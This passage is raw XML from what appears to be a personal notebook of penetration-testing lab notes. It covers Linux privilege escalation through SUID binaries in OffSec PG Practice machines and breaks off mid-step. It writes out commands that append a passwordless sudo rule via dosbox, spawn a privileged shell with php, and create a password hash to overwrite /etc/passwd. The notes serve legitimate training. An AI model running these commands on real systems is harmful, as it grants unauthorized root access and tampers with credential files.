          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002175">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002176">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002177">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002178">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_triv14e6b1ij" w:id="294"/>
      <w:bookmarkEnd w:id="294"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/dosbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002179">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId708">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they found /usr/bin/dosoox with SUID bit set and they saw it in GTFOBins. It allows them to write to files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then tried to write to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root’s authorized_keys file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But both failed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then they wrote to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFILE='/etc/sudoers'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/dosbox -c 'mount c /' -c "echo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commander </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL) NOPASSWD: ALL &gt;&gt; c:$LFILE" -c exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002181">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commander</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is the name of the current user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002182">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they did </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and got root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002183">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002184">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:hyperlink r:id="rId709">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also adds to /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002185">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jswv0t3ggdho" w:id="295"/>
      <w:bookmarkEnd w:id="295"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/start-stop-daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002188">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/start-stop-daemon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was highlighted in yellow by linPEAS and could priv esc using the one liner from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002189">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2374900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="118" name="image108.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image108.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71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218A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId711">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</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18B">
      <w:pPr>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nm4tq1mid3ay" w:id="296"/>
      <w:bookmarkEnd w:id="296"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php7.4 (but any version works)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId712">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Astronaut</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002190">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002191">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They just ran the one-liner from </w:t>
      </w:r>
      <w:hyperlink r:id="rId713">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002192">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5424488" cy="1921173"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="364" name="image365.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image365.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId714"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5424488" cy="19211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193">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You just run the last line and point it to your specific php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002194">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can ignore the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD="/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002195">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002196">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002197">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002198">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pf13j33ow902" w:id="297"/>
      <w:bookmarkEnd w:id="297"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/wget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002199">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId715">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use it to overwrite files. In both writeups I looked at, they both overwrote /etc/passwd since they had LFI so they knew what the original /etc/passwd was so they could append their new creds to the original. But, I think we could possibly just create a brand new /etc/passwd wit nothing but our new user. Or try overwriting /etc/sudoers. Only problem is if we make a mistake, we corrupt the original and can't get it back. But here's the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #1: Create root user hash on my local attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 -salt user3 pass123 $1$user3$rAGRVf5p2jYTqtqOW5cPu/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4635500" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="135" name="image143.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image143.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId716"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46355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219F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #2: Extract target’s /etc/passwd file and add new user to bottom of it locally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
